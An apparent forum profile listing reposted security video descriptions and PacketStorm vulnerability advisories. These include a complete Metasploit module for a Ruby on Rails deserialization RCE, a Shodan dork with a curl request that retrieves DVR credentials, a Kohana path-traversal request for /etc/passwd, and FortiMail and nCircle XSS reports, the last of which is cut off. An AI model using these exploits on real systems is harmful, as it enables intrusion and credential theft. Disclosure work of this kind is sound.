Praetorian503
Active Members-
Posts
578 -
Joined
-
Last visited
-
Days Won
5
Everything posted by Praetorian503
-
Description: Welcome to the Aircrack-ng Megaprimer Part 2! In this video, I will cover the second tool in the series: airodump-ng. Please feel free to ask any questions you may have or leave any feedback in the comments below. Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying. Original Source: Source: Aircrack-Ng Megaprimer Part 2: Airodump-Ng
-
Salut si bine ai venit Ema!
-
Nu cred ca il va folosi nimeni, asta pentru ca e simplu si nu are cu ce sa ajute. Incearca sa faci ceva mai avansat, mai interesant si care sa lase o parere buna, iar design-ul e praf..50 de culori, butoanele puse aiurea, background anon*mous, seamana cu metin12. Nu te descurajez, poti trage o concluzie. Cu toate astea, cred ca se vor gasi copii care cauta asa ceva.
-
Description: In this video I will show you how you can use Linux for reverse shell connection. Using some command you can open the port for shell. These techniques we can use for abusing a service for advanced exploitation in XSS or command execution vulnerability. Original Source : - 7 Linux Shells Using Built-in Tools Source:http://www.securitytube.net/video/6787
-
Description: In this video I will show you how to use Recon-ng framework for employee’s information gathering and subdomain recovery. There are lot more features available but I will cover this two of them. In this framework out result is fantastic, I mean you can generate html & csv output for whatever you do using this framework. Recon-ng is a full-featured Web Reconnaisance framework written in Python. Complete with independent modules, database interaction, built in convenience functions, interactive help, and command completion, Recon-ng provides a powerful environment in which open source web-based reconnaissance can be conducted quickly and thoroughly. Recon-ng has a look and feel similar to the Metasploit Framework, reducing the learning curve for leveraging the framework. However, it is quite different. Recon-ng is not intended to compete with existing frameworks, as it is designed exclusively for web-based open source reconnaissance. If you want to exploit, use the Metasploit Framework. If you want to Social Engineer, us the Social Engineer Toolkit. If you want to conduct reconnaissance, use Recon-ng! See the Usage Guide for more information. Recon-ng is a completely modular framework and makes it easy for even the newest of Python developers to contribute. Each module is a subclass of the "module" class. The "module" class is a customized "cmd" interpreter equipped with built-in functionality that provides simple interfaces to common tasks such as standardizing output, interacting with the database, making web requests, and managing API keys. Therefore, all the hard work has been done. Building modules is simple and takes little more than a few minutes. See the Development Guide for more information. Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying. Original Source: Source: Recon-Ng Framework Usage
-
Description: Android is the only widespread open-source phone environment available today, but actually hacking on it can be an exercise in frustration, with over 14 million lines of code (not counting the Linux kernel!), build times in the hours, and the choice of writing Java or C++/JNI. Add in security debacles like the CarrierIQ affair or the alleged man-in-the-middle attacks at the last DEF CON and Android starts to seem less attractive. We wanted a phone that's easy to hack on, with a quick development turnaround time. By killing off the Java layer of Android and only loading the underlying Linux system, we found a useful, relatively light-weight platform for further development. We then adapted the Inferno operating system to run on our phones, eventually getting a graphical phone environment in under 1 million lines of code, including a phone application, an SMS app, several text editors, a shell, a compiler, a web browser, a mail client, and even some games. The actual core of the Inferno OS is small and simple enough for one person to read, understand, audit, and hack on; applications are similarly simple and easy to write. This talk discusses in greater depth our motivations and the methods we used to adapt Android phones to new and excitingly broken purposes. If the Demo Gods are kind, there will also be a demonstration of the Inferno phone environment. *Sandia National Laboratories is a multi-program laboratory managed and operated by Sandia Corporation, a wholly owned subsidiary of Lockheed Martin Corporation, for the U.S. Department of Energy's National Nuclear Security Administration under contract DE-AC04-94AL85000. SAND-2012-3785 A John Floren is a Senior Member of Technical Staff at Sandia National Laboratories, where he works in High Performance Computing and security research. He occasionally puts odd operating systems on inappropriate systems, so far having helped port Plan 9 to the IBM Blue Gene series and Inferno to cell phones. Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying. Original Source: Source: Hellaphone: Replacing The Java In Android
-
Description: This presentation will demonstrate that permanent backdooring of hardware is practical. We have built a generic proof of concept malware for the intel architecture, Rakshasa, capable of infecting more than a hundred of different motherboards. The first net effect of Rakshasa is to disable NX permanently and remove SMM related fixes from the BIOS, resulting in permanent lowering of the security of the backdoored computer, even after complete earasing of hard disks and reinstallation of a new operating system. We shall also demonstrate that preexisting work on MBR subvertions such as bootkiting and preboot authentication software bruteforce can be embedded in Rakshasa with little effort. More over, Rakshasa is built on top of free software, including the Coreboot project, meaning that most of its source code is already public. This presentation will take a deep dive into Coreboot and hardware components such as the BIOS, CMOS and PIC embedded on the motherboard, before detailing the inner workings of Rakshasa and demo its capabilities. It is hoped to raise awareness of the security community regarding the dangers associated with non open source firmwares shipped with any computer and question their integrity. This shall also result in upgrading the best practices for forensics and post intrusion analysis by including the afore mentioned firmwares as part of their scope of work. Jonathan Brossard is a security research engineer. Born in France, he's been living in Brazil and India, before currently working in Australia. With about 15 years of practice of assembly, he is specialised in low level security, from raw sockets to cryptography and memory corruption bugs. He is currently working as CEO and security consultant at the Toucan System security company. His clients count some of the biggest Defense and Financial Institutions worldwide. Jonathan is also the co-organiser of the Hackito Ergo Sum conference (HES) in France. Twitter: @endrazine Facebook: toucansystem Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying. Original Source: Source: Hardware Backdooring Is Practical
-
Description: There's been a lot buzz about UEFI Secure Booting, and the ability of hardware and software manufacturers to lock out third-party loaders (and rootkits). Even the NSA has been advocating the adoption of measured boot and hardware-based integrity checks. But what does this trend mean to the open source and hacker communities? In this talk I'll demonstrate measured boot in action. I'll also be releasing my new Measured Boot Tool which allows you to view Trusted Platform Module (TPM) boot data and identify risks such as unsigned early-boot drivers. And, I'll demonstrate how measured boot is used for remote device authentication. Finally, I'll discuss weaknesses in the system (hint: bootstrapping trust is still hard), what this technology means to the consumerization trend in IT, and what software and services gaps exist in this space for aspiring entrepreneurs. Dan Griffin is the founder of JW Secure, a Seattle-based security software company. He has published several articles on security software development, as well as on IT security, and is a frequent conference speaker. Dan holds a Masters degree in Computer Science from the University of Washington and a Bachelors degree in Computer Science from Indiana University. Dan previously gained notoriety for demonstrating how to use a hacked smart card to compromise Windows Vista. Twitter: @jwsdan Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying. Original Source: Source: Hacking Measured Boot And Uefi
-
Description: In this video I will show you how to crack well known services like SSH, FTP, RDP, and VNC using Ncrack. Ncrack is very powerful and fast tool for brute-force attack on live services. Using this tool you can attack on multiple services. Ncrack is a high-speed network authentication cracking tool. It was built to help companies secure their networks by proactively testing all their hosts and networking devices for poor passwords. Security professionals also rely on Ncrack when auditing their clients. Ncrack was designed using a modular approach, a command-line syntax similar to Nmap and a dynamic engine that can adapt its behaviour based on network feedback. It allows for rapid, yet reliable large-scale auditing of multiple hosts. Ncrack - High-speed network authentication cracker Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying. Original Source: Source: Ncrack - Brute Force Attack On Rdp, Vnc, Ssh, Ftp
-
Description: In this video I will show you how to crack Wireless WPA-2 Encryption using Aircrack-ng. I think WPA-2 Cracking process is very easy but only if you have the correct password in your dictionary. There are lots of online services available for wpa-2 cracking but you need to pay for it. Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying. Original Source: Source: Crack Wpa-2 Manually
-
- 1
-
This Metasploit module exploits a remote code execution vulnerability in the JSON request processor of the Ruby on Rails application framework. This vulnerability allows an attacker to instantiate a remote object, which in turn can be used to execute any ruby code remotely in the context of the application. This vulnerability is very similar to CVE-2013-0156. This Metasploit module has been tested successfully on RoR 3.0.9, 3.0.19, and 2.3.15. The technique used by this module requires the target to be running a fairly recent version of Ruby 1.9 (since 2011 or so). Applications using Ruby 1.8 may still be exploitable using the init_with() method, but this has not been demonstrated. ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # web site for more information on licensing and terms of use. # http://metasploit.com/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::CmdStagerTFTP include Msf::Exploit::Remote::HttpClient def initialize(info = {}) super(update_info(info, 'Name' => 'Ruby on Rails JSON Processor YAML Deserialization Code Execution', 'Description' => %q{ This module exploits a remote code execution vulnerability in the JSON request processor of the Ruby on Rails application framework. This vulnerability allows an attacker to instantiate a remote object, which in turn can be used to execute any ruby code remotely in the context of the application. This vulnerability is very similar to CVE-2013-0156. This module has been tested successfully on RoR 3.0.9, 3.0.19, and 2.3.15. The technique used by this module requires the target to be running a fairly recent version of Ruby 1.9 (since 2011 or so). Applications using Ruby 1.8 may still be exploitable using the init_with() method, but this has not been demonstrated. }, 'Author' => [ 'jjarmoc', # Initial module based on cve-2013-0156, testing help 'egypt', # Module 'lian', # Identified the RouteSet::NamedRouteCollection vector ], 'License' => MSF_LICENSE, 'References' => [ ['CVE', '2013-0333'], ], 'Platform' => 'ruby', 'Arch' => ARCH_RUBY, 'Privileged' => false, 'Targets' => [ ['Automatic', {} ] ], 'DisclosureDate' => 'Jan 28 2013', 'DefaultOptions' => { "PrependFork" => true }, 'DefaultTarget' => 0)) register_options( [ Opt::RPORT(80), OptString.new('TARGETURI', [ true, 'The path to a vulnerable Ruby on Rails application', "/"]), OptString.new('HTTP_METHOD', [ true, 'The HTTP request method (GET, POST, PUT typically work)', "POST"]) ], self.class) end # # Create the YAML document that will be embedded into the JSON # def build_yaml_rails2 code = Rex::Text.encode_base64(payload.encoded) yaml = "--- !ruby/hash:ActionController::Routing::RouteSet::NamedRouteCollection\n" + "'#{Rex::Text.rand_text_alpha(rand(8)+1)}; " + "eval(%[#{code}].unpack(%[m0])[0]);' " + ": !ruby/object:ActionController::Routing::Route\n segments: []\n requirements:\n " + ":#{Rex::Text.rand_text_alpha(rand(8)+1)}:\n :#{Rex::Text.rand_text_alpha(rand(8)+1)}: " + ":#{Rex::Text.rand_text_alpha(rand(8)+1)}\n" yaml.gsub(':', '\u003a') end # # Create the YAML document that will be embedded into the JSON # def build_yaml_rails3 code = Rex::Text.encode_base64(payload.encoded) yaml = "--- !ruby/hash:ActionDispatch::Routing::RouteSet::NamedRouteCollection\n" + "'#{Rex::Text.rand_text_alpha(rand(8)+1)};eval(%[#{code}].unpack(%[m0])[0]);' " + ": !ruby/object:OpenStruct\n table:\n :defaults: {}\n" yaml.gsub(':', '\u003a') end def build_request(v) case v when 2; build_yaml_rails2 when 3; build_yaml_rails3 end end # # Send the actual request # def exploit [2, 3].each do |ver| print_status("Sending Railsv#{ver} request to #{rhost}:#{rport}...") send_request_cgi({ 'uri' => normalize_uri(target_uri.path), 'method' => datastore['HTTP_METHOD'], 'ctype' => 'application/json', 'headers' => { 'X-HTTP-Method-Override' => 'get' }, 'data' => build_request(ver) }, 25) handler end end end Source: PacketStorm
-
Hunt CCTV and generic brands suffer from a file disclosure vulnerability that discloses authentication information. Hunt CCTV (and generics brands) Insufficient Authentication January 17, 2013 - A. Ramos <aramosf @ gmail . com> -- CVE ID: CVE-2013-1391 [reserved] -- Affected Vendors: Hunt CCTV (http://www.huntcctv.com/) ** generic brands from Hunt ** Capture CCTV (http://www.capturecctv.ca/) NoVus CCTV (http://www.novuscctv.com/) Well-Vision Inc (http://well-vision.com/) -- Affected Models: DVR-04 / DVR-04CH (HuntCCTV) DVR-04NC (HuntCCTV) DVR-08 / DVR-08CH (HuntCCTV) DVR-08NC (HuntCCTV) DVR-16 / DVR-16CH (HuntCCTV) CDR 0410VE (CaptureCCTV-HuntCCTV) CDR 0820VDE (CaptureCCTV-HuntCCTV) DR6-704A4H (HuntCCTV) DR6-708A4H (HuntCCTV) DR6-7316A4H (HuntCCTV) DR6-7316A4HL (HuntCCTV) HDR-04KD (unknown-HuntCCTV) HDR-08KD (unknown-HuntCCTV) HV-04RD PRO (Hachi-HuntCCTV) HV-08RD PRO (Hachi-HuntCCTV) NV-DVR1204 (NovusSec) NV-DVR1208 (NovusSec) NV-DVR1216 (NovusSec) TW-DVR604 (Well Vision INC Solutions-HuntCCTV) TW-DVR616 (Well Vision INC Solutions-HuntCCTV) Shodan dork: Basic realm="DVR" server: httpd -mini Shodan results: 46890 Vulnerable: >70% -- Vulnerability Details: You can get the entire backup config with simple GET. No authentication required. All information are in clear text: admin panel, ddns config, ppoe credentials, misc. Example: [aramosf@velouria data]$ curl -v http://x.x.x.x/DVR.cfg | strings |grep -i USER * Trying x.x.x.x... connected * Connected to x.x.x.x (x.x.x.x) port 80 (#0) > GET /DVR.cfg HTTP/1.1 > User-Agent: curl/7.19.7 (x86_64-redhat-linux-gnu) libcurl/7.19.7 NSS/ 3.13.1.0 zlib/1.2.3 libidn/1.18 libssh2/1.2.2 > Host: x.x.x.x > Accept: */* > < HTTP/1.0 200 Ok < Server: httpd < Date: Fri, 17 Jan 2013 05:47:02 GMT < Cache-Control: no-cache < Pragma: no-cache < Expires: 0 < Connection: close < Content-Type: application/octet-stream < USER1_USERNAME=iam USER1_PASSWORD=sexy Vulnerable firmware (127 different ones): - 1.1.10 to 1.1.92 - 1.47 to 1.51 - 2.0.0 to 2.1.93 - 3.0.04 to 3.1.92 -- Disclosure Timeline: 2011-09-?? - Vulnerability discovered 2012-12-20 - Published in the book "Hacker Epico" ( http://www.hackerepico.com) 2013-01-15 - CVE Assigned 2013-01-20 - Vulnerability reported to vendor 2013-01-24 - Vulnerability reported to GDT (Spain) 2013-01-28 - Public disclosure: http://www.securitybydefault.com/2013/01/12000-grabadores-de-video-expuestos-en.html -- Alejandro Ramos www.securitybydefault.com Source: PacketStorm
-
Kohana Framework version 2.3.3 suffers from a directory traversal vulnerability. Title: ====== Kohana Framework v2.3.3 - Directory Traversal Vulnerability Date: ===== 2013-01-27 References: =========== http://www.vulnerability-lab.com/get_content.php?id=841 VL-ID: ===== 837 Common Vulnerability Scoring System: ==================================== 7.1 Introduction: ============= Kohana is an open source, object oriented MVC web framework built using PHP5 by a team of volunteers that aims to be swift, secure, and small. (copy from vendor website) This is an OOP framework that is extremely DRY. Everything is built using strict PHP 5 classes and objects. Many common components are included: translation tools, database access, code profiling, encryption, validation, and more. Extending existing components and adding new libraries is very easy. Uses the BSD license, so you can use and modify it for commercial purposes. Benchmarking a framework is hard and rarely reflects the real world, but Kohana is very efficient and carefully optimized for real world usage. Very well commented code and a simple routing structure makes it easy to understand what is happening. Simple and effective tools help identify and solve performance issues quickly. (Copy of the Vendor Homepage: http://kohanaframework.org/ ) Abstract: ========= The Vulnerability Laboratory Research Team discovered a Directory Traversal web vulnerability in the Kohana v2.3.3 Content Management System. Report-Timeline: ================ 2013-01-27: Public Disclosure Status: ======== Published Affected Products: ================== Kohana Product: Framework - Content Management System 2.3.3 Exploitation-Technique: ======================= Remote Severity: ========= High Details: ======== A Directory Traversal web vulnerability is detected in the Kohana Content Management System web application. The vulnerability allows remote attackers to request local directories and files of the web server application system. The vulnerability is located in the `master/classes/Kohana/Filebrowser.php` file in line 90 when processing to request the path dir via replace. The filter replaces `../` by null and it applies on file reading requests. Review: Kohana/Filebrowser.php $thumb = Route::get('wysiwyg/filebrowser') ->uri(array( 'action' => 'thumb', 'path' => str_replace(array($dir, DIRECTORY_SEPARATOR), array('', '/'), $filename) )); Remote attackers can bypass the validation with the vulnerable replace function in the file browser to read local web server files via directory (path) traversal attack. Exploitaton of the vulnerability requires no privileged application user account and no user interaction. Successful exploitation of the vulnerability results in read of arbitrary system files to compromise web server. Vulnerable Module(s): [+] Filebrowser Vulnerable Function(s): [+] str_replace > dir Vulnerable Parameter(s): [+] ?path Proof of Concept: ================= The vulnerability can be exploited by remote attackers without privileged application user account and without required user interaction. For demonstration or reproduce ... Review: Kohana/Filebrowser.php $thumb = Route::get('wysiwyg/filebrowser') ->uri(array( 'action' => 'thumb', 'path' => str_replace(array($dir, DIRECTORY_SEPARATOR), array('', '/'), $filename) )); Review: GET Request GET http://media.[server].com/directory/graphics/?path=..%2F..%2F..%2F%2F..%2F.. %2F%2F..%2F..%2F%2F..%2F..%2F%2F..%2F..%2F%2F..%2F..%2F%2F%2Fetc%2Fpasswd HTTP/1.0 Host: media.[server].com User-Agent: Kami VL PoC: http://media.[server].com/directory/graphics/?path=..%2F..%2F..%2F%2F..%2F..%2F%2F..%2F..%2F%2F..%2F..%2F%2F..%2F..%2F%2F%2Fetc%2Fpasswd Risk: ===== The security risk of the directory traversal web vulnerability is estimated as high(+). Credits: ======== Vulnerability Laboratory [Research Team] - Karim B. (kami@vulnerability-lab.com) Disclaimer: =========== The information provided in this advisory is provided as it is without any warranty. Vulnerability-Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability- Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material. Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.vulnerability-lab.com/register Contact: admin@vulnerability-lab.com - support@vulnerability-lab.com - research@vulnerability-lab.com Section: video.vulnerability-lab.com - forum.vulnerability-lab.com - news.vulnerability-lab.com Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, sourcecode, videos and other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact (admin@vulnerability-lab.com or support@vulnerability-lab.com) to get a permission. Copyright © 2012 | Vulnerability Laboratory -- VULNERABILITY RESEARCH LABORATORY LABORATORY RESEARCH TEAM CONTACT: research@vulnerability-lab.com Source: PacketStorm
-
Exception-handling and input filter bypass vulnerabilities have been detected in Fortinet's FortiMail IBE Appliance Application versions 200D, 400C, VM2K, 2000B, and 5002B. Title: ====== Fortinet FortiMail 400 IBE - Multiple Web Vulnerabilities Date: ===== 2013-01-23 References: =========== http://www.vulnerability-lab.com/get_content.php?id=701 VL-ID: ===== 701 Common Vulnerability Scoring System: ==================================== 7.1 Introduction: ============= The FortiMail family of appliances is a proven, powerful messaging security platform for any size organization, from small businesses to carriers, service providers, and large enterprises. Purpose-built for the most demanding messaging systems, the FortiMail appliances utilize Fortinet’s years of experience in protecting networks against spam, malware, and other message-borne threats. You can prevent your messaging system from becoming a threat delivery system with FortiMail. Its inbound filtering engine blocks spam and malware before it can clog your network and affect users. Its outbound inspection technology prevents outbound spam or malware (including 3G mobile traffic) from causing other antispam gateways to blacklist your users. Three deployment modes offer maximum versatility while minimizing infrastructure changes or service disruptions: transparent mode for seamless integration into existing networks with no changes to your existing mail server, gateway mode as a proxy MTA for existing messaging gateways, or full messaging server functionality for remote locations. FortiMail provides Identity-Based Encryption (IBE), in addition to S/MIME and TLS, as email encryption option to enforce policy-based encryption for secure content delivery. Furthermore, the FortiMail customizable and predefined dictionaries prevent accidental or intentional loss of confidential and regulated data. (Copy of the Vendor Homepage: http://www.fortinet.com/products/fortimail/ ) Abstract: ========= The Vulnerability Laboratory Research Team discovered multiple web vulnerabilities in Fortinets FortiMail IBE 400Appliance Application. Report-Timeline: ================ 2012-09-16: Researcher Notification & Coordination 2012-09-18: Vendor Notification 2012-10-08: Vendor Response/Feedback 2012-**-**: Vendor Fix/Patch (NO RESPONSE BY PSIRT) 2013-01-23: Public Disclosure Status: ======== Published Affected Products: ================== Fortinet Product: FortiMail Appliance Series 400 IBE Exploitation-Technique: ======================= Remote Severity: ========= High Details: ======== An exception-handling and input filter bypass vulnerability is detected in the Fortinets FortiMail IBE Appliance Application 200D,400C, VM2K, 2000B and 5002B. The first vulnerability is located in the parse module with the bound vulnerable exception-handling and vulnerable effect on all input fields. The vulnerability allows an attacker to bypass the input parse routine by an implement of 2 close tags, which results in the execution of the secound injected script code with a space between. The secound vulnerability is located in the import/upload certificate module with the bound vulnerable certificate name and information parameters. An attacker can implement own certificates with script code in the malicious name and information values. After the upload the persistent code get executed out of the certificate listing main module. Successful exploitation of the vulnerabilities allows to hijack admin/customer sessions, can lead to information disclosure or result in stable manipulation of web context (persistent & non-persistent). Vulnerable Module(s): [+] Invalid - Exception Handling Vulnerable Parameter(s): [+] ipmask [+] username [+] address [+] url Proof of Concept: ================= 1.1 The exception handling and filter bypass vulnerability can be exploited by remote attackers and local low privileged user account. For demonstration or reproduce ... Module: IPAddressMask - ext-mb-text, ext-gen4185 & ext-gen7196 INJECT: https://127.0.0.1:1338/admin/FEAdmin.html#SysInterfaceCollection <div id="ext-gen4183"><div id="ext-gen4184" class="ext-mb-icon ext-mb-error"></div><div id="ext-gen7197" class="ext-mb-content"><span id="ext-gen4185" class="ext-mb- text">Error:IPAddressMask( 2 ) , IPAddressMask.cpp:14, "Invalid mask:" ><iframe id="ext-gen7196" [PERSISTENT INJECTED SCRIPT CODE!];)" <="" "=""><[PERSISTENT INJECTED SCRIPT CODE!]") <"><[PERSISTENT INJECTED SCRIPT CODE!]") </0"</iframe></span> AFFECTED: https://127.0.0.1:1338/admin/FEAdmin.html#SysInterfaceCollection Module: Whitelist & Blacklist - Address URL: https://209.87.230.132:1443/admin/FEAdmin.html#PersonalBlackWhiteList <div id="ext-gen10562" class="ext-mb-content"><span id="ext-gen5714" class="ext-mb-text"> Invalid address: "><[PERSISTENT INJECTED SCRIPT CODE!];)" <="" -="" "=""><[PERSISTENT INJECTED SCRIPT CODE!]") <</iframe></span> AFFECTED: https://209.87.230.132:1443/admin/FEAdmin.html#SystemBlackWhiteList Module: Bounce Verification - Username URL: https://209.87.230.132:1443/admin/FEAdmin.html#AsBounceverifyKeyCollection <div id="ext-gen7197" class="ext-mb-content"><span id="ext-gen4185" class="ext-mb-text"> Invalid user name: ""><iframe id="ext-gen19608" [PERSISTENT INJECTED SCRIPT CODE!];)" <="" "=""><[PERSISTENT INJECTED SCRIPT CODE!]") <"</iframe></span> 1.2 The persistent vulnerability can be exploited by remote attackers with privileged application account and low required user inter action. For demonstration or reproduce ... Module: Upload or Import - Local Certificate - Certificate name URL: https://209.87.230.132:1443/admin/FEAdmin.html#SysCertificateDetailCollection <div id="ext-gen38011" class="x-grid3-body"><div id="ext-gen38041" class="x-grid3-row x-grid3-row-selected " style="width: 1158px;"> <table class="x-grid3-row-table" style="width: 1158px;" border="0" cellpadding="0" cellspacing="0"><tbody><tr><td id="ext-gen38095" class="x-grid3-col x-grid3-cell x-grid3-td-mkey x-grid3-cell-first " style="width:248px;" tabindex="0"><div id="ext-gen38036" class="x-grid3-cell-inner x-grid3-col-mkey" unselectable="on">[PERSISTENT INJECTED SCRIPT CODE AS CERTIFICATE NAME!]</div></td> <td class="x-grid3-col x-grid3-cell x-grid3-td-subject " style="width: 726px;" tabindex="0"><div id="ext-gen38068" class="x-grid3-cell-inner x-grid3- col-subject" unselectable="on">/[PERSISTENT INJECTED SCRIPT CODE AS CERTIFICATE VIA INFORMATION!]</div></td> <td id="ext-gen38085" class="x-grid3-col x-grid3-cell x-grid3-td-status " style="width:148px;" tabindex="0"><div id="ext-gen38086" class="x-grid3-cell-inner x-grid3-col-status" unselectable="on">OK</div></td><td id="ext-gen38084" class="x-grid3-col x-grid3-cell x-grid3-td-isReferenced x-grid3-cell-last " style="width:28px;" tabindex="0"><div class="x-grid3-cell-inner x-grid3-col-isReferenced" unselectable="on"><img src="images/gray-ball.png" alt="0" align="absmiddle" border="0"></div></td></tr></tbody></table></div><div id="ext-gen38040" class="x-grid3-row x-grid3-row-alt " style="width: 1158px;"> <table class="x-grid3-row-table" style="width: 1158px;" border="0" cellpadding="0" cellspacing="0"><tbody><tr><td class="x-grid3-col x-grid3-cell x-grid3-td-mkey x-grid3-cell-first " style="width:248px;" tabindex="0"><div id="ext-gen38037" class="x-grid3-cell-inner x-grid3-col-mkey" unselectable="on">[PERSISTENT INJECTED SCRIPT CODE AS CERTIFICATE NAME!]</div></td> <td class="x-grid3-col x-grid3-cell x-grid3-td-subject " style="width: 726px;" tabindex="0"><div id="ext-gen38039" class="x-grid3-cell-inner x-grid3- col-subject" unselectable="on">[PERSISTENT INJECTED SCRIPT CODE AS CERTIFICATE VIA INFORMATION!]</div></td><td class="x-grid3-col x-grid3-cell x-grid3-td-status " style="width:148px;" tabindex="0"><div id="ext-gen38102" class="x-grid3-cell-inner x-grid3-col-status" unselectable="on">Default</div></td><td id="ext-gen38101" class="x-grid3-col x-grid3-cell x-grid3-td- isReferenced x-grid3-cell-last " style="width:28px;" tabindex="0"><div id="ext-gen38083" class="x-grid3-cell-inner x-grid3-col-isReferenced" unselectable="on"><img id="ext-gen38100" src="images/red-ball.png" alt="1" align="absmiddle" border="0"></div></td></tr></tbody></table></div></div> Solution: ========= 1.1 The exception-handling vulnerability can be fixed by parsing the full content without excluding after a close tag. Restrict the input fields to allowed chars. 1.2 The persistent vulnerability in the certificate import/upload module can be patched by parsing the certificate name and info input field. Do not forget to parse also the vulnerable output listing of the certificate name and cert information. Risk: ===== The security risk of the of the exception-handling and input filter bypass vulnerability is estimated as high(-). Credits: ======== Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@vulnerability-lab.com) Disclaimer: =========== The information provided in this advisory is provided as it is without any warranty. Vulnerability-Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability- Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material. Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.vulnerability-lab.com/register Contact: admin@vulnerability-lab.com - support@vulnerability-lab.com - research@vulnerability-lab.com Section: video.vulnerability-lab.com - forum.vulnerability-lab.com - news.vulnerability-lab.com Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, sourcecode, videos and other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact (admin@vulnerability-lab.com or support@vulnerability-lab.com) to get a permission. Copyright © 2012 | Vulnerability Laboratory -- VULNERABILITY RESEARCH LABORATORY LABORATORY RESEARCH TEAM CONTACT: research@vulnerability-lab.com Source: PacketStorm
-
nCircle PureCloud Vulnerability Scanner suffered from bypass and cross site scripting vulnerabilities. Title: ====== nCircle PureCloud Vulnerability Scanner - Multiple Web Vulnerabilities Date: ===== 2013-01-28 References: =========== http://www.vulnerability-lab.com/get_content.php?id=795 nCircle Tracking ID: 20130117-US11337 VL-ID: ===== 795 Common Vulnerability Scoring System: ==================================== 4.1 Introduction: ============= nCircle PureCloud is brought to you by nCircle, the leading provider of information risk and security performance management solutions. PureCloud delivers an enterprise-class vulnerability scanner with more than double the coverage of other providers covering thousands of conditions and prioritized risk assessments – all in a cloud-based solution. nCircle PureCloud is the world’s first security scanning technology that requires no scanning infrastructure on the customer network. PureCloud eliminates the need for firewall changes and software or hardware deployment on a customer`s internal network.. Requiring only a Web browser, PureCloud securely scans a private network to identify a broad range of vulnerabilities and risks, and provides detailed guidance on the steps necessary to reduce or eliminate those risks. With PureCloud, small businesses and home offices benefit from nCircle’s most advanced enterprise class security scanning solution, without the complexity or maintenance associated with traditional SaaS or on-premise scanning products. PureCloud is delivered as a software service in the Cloud, making it cost-effective, efficient and widely accessible. (Copy of the Vendor Homepage: https://purecloud.ncircle.com/about_purecloud/ ) Abstract: ========= The Vulnerability-Laboratory Research Team discovered a web vulnerability in the nCircle PureCloud (cloud-based) Vulnerability Scanner Application. Report-Timeline: ================ 2012-12-24: Researcher Notification & Coordination 2012-12-25: Vendor Notification 2012-01-16: Vendor Response/Feedback 2012-01-28: Vendor Fix/Patch by nCricle Dev 2012-01-28: Public Disclosure Status: ======== Published Affected Products: ================== nCircle Product: PureCloud - Vulnerability Scanner (cloud-based) 2012 Q4 Exploitation-Technique: ======================= Remote Severity: ========= Medium Details: ======== A persistent and client side POST Injection web vulnerability is detected in the in the nCircle PureCloud (cloud-based) Vulnerability Scanner Application. The vulnerability typus allows an attacker to inject own malicious script code in the vulnerable module on application side (persistent). 1.1 The first vulnerability is located in the Scan Now > Scan Type > Perimeter Scan > Scan section when processing to request via the `Scan Specific Devices - [Add Devices]` module and the bound vulnerable formErrorContent exception-handling application parameters. The persistent injected script code will be executed out of the `invalid networks` web application exception-handling. To bypass the standard validation of the application filter the attacker need to provoke the specific invalid networks exception-handling error. In the secound step the attacker splits the request of the invalid filter context to execute after it the not parsed malicious script code. The vulnerability can be exploited on client side via force manipulated link as malicious request with medium user interaction but also via server side by a post injection in the later affected add server listing module. 1.2 The secound vulnerability is bound to the first issue and located in the IP & Name output listing of the scan index after processing to add a network/server/ip. The code will be executed out of the main ip & name listing after an evil inject via add module. To bypass the ip restriction filter it is required to split the request like in the first issue with a valid ip. The remote attacker includes a valid ip+split(%20)`+own_scriptcode to pass through the system validation filter and execute the script code out of the device name and ip listing. 